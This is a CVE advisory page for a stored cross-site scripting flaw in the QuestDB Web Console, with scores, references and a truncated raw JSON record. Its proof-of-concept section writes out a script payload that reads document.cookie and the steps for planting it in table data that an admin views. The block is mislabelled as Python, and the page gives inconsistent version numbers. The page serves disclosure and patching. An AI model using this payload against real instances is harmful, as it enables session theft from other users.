CVE-2026-0824

Description

A security flaw has been discovered in questdb ui up to 1.11.9. Impacted is an unknown function of the component Web Console. The manipulation results in cross site scripting. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks. Upgrading to version 1.1.10 is recommended to address this issue. The patch is identified as b42fd9f18476d844ae181a10a249e003dafb823d. You should upgrade the affected component. The vendor confirmed early that the fix "is going to be released as a part of QuestDB 9.3.0" as well.

CVSS Details

CVSS Score

3.5

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

QuestDB UI < 1.1.10

QuestDB < 9.3.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2026-0824 PoC - QuestDB Web Console XSS
// This PoC demonstrates the stored XSS vulnerability in QuestDB Web Console

// Payload: <script>alert(document.cookie)</script>
// This payload can be injected through:
// 1. Query input field in Web Console
// 2. Table name or column name when creating tables
// 3. Data values inserted into database tables

const xssPayload = '<script>alert(document.cookie)</script>';

// Example attack scenario:
// 1. Attacker logs into QuestDB Web Console
// 2. Attacker executes: CREATE TABLE test(id INT, name STRING);
// 3. Attacker inserts: INSERT INTO test VALUES(1, '<script>alert(document.cookie)</script>');
// 4. When admin views the table data, the XSS payload executes

// Mitigation: Upgrade to QuestDB 9.3.0 or UI 1.1.10
// Patch commit: https://github.com/questdb/ui/commit/b42fd9f18476d844ae181a10a249e003dafb823d

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-0824
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-0824
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-0824/
[4] VulDB https://vuldb.com/cve/CVE-2026-0824
[5] https://github.com/59lab/dbdb/blob/main/There%20is%20a%20cross-site%20scripting(XSS)%20vulnerability%20in%20the%20QuestDB%20database.md
[6] https://github.com/questdb/questdb/releases/tag/9.3.0
[7] https://github.com/questdb/ui/
[8] https://github.com/questdb/ui/commit/b42fd9f18476d844ae181a10a249e003dafb823d
[9] https://github.com/questdb/ui/pull/518
[10] https://github.com/questdb/ui/pull/519#issue-3790862030
[11] https://vuldb.com/?ctiid.340357
[12] https://vuldb.com/?id.340357
[13] https://vuldb.com/?submit.733253

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-0824", "sourceIdentifier": "[email protected]", "published": "2026-01-10T15:15:50.137", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in questdb ui up to 1.11.9. Impacted is an unknown function of the component Web Console. The manipulation results in cross site scripting. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks. Upgrading to version 1.1.10 is recommended to address this issue. The patch is identified as b42fd9f18476d844ae181a10a249e003dafb823d. You should upgrade the affected component. The vendor confirmed early that the fix \"is going to be released as a part of QuestDB 9.3.0\" as well."}, {"lang": "es", "value": "Una falla de seguridad ha sido descubierta en questdb ui hasta 1.11.9. Afectada es una función desconocida del componente Consola Web. La manipulación resulta en cross site scripting. El ataque puede ser ejecutado remotamente. El exploit ha sido liberado al público y puede ser usado para ataques. Se recomienda actualizar a la versión 1.1.10 para abordar este problema. El parche se identifica como b42fd9f18476d844ae181a10a249e003dafb823d. Debería actualizar el componente afectado. El proveedor confirmó tempranamente que la corrección 'será lanzada como parte de QuestDB 9.3.0' también."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://github.com/59lab/dbdb/blob/main/There%20is%20a%20cross-site%20scripting(XSS)%20vulnerability%20in%20the%20QuestDB%20database.md", "source": "[email protected]"}, {"url": "https://github.com/questdb/questdb/releases/tag/9.3.0", "source": "[email protected]"}, {"url": "https://github.com/questdb/ui/", "source": "[email protected]"}, {"url": "https://github.com/questdb/ui/commit/b42fd9f18476d844ae181a10a249e003dafb823d", "source": "[email protected]"}, {"url": "https://github.com/questdb/ui/pull/518", "source": "[email protected]"}, {"url": "https://github.com/questdb/ui/pull/519#issue-3790862030", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.340357", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.340357", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.733253", "s ... (truncated)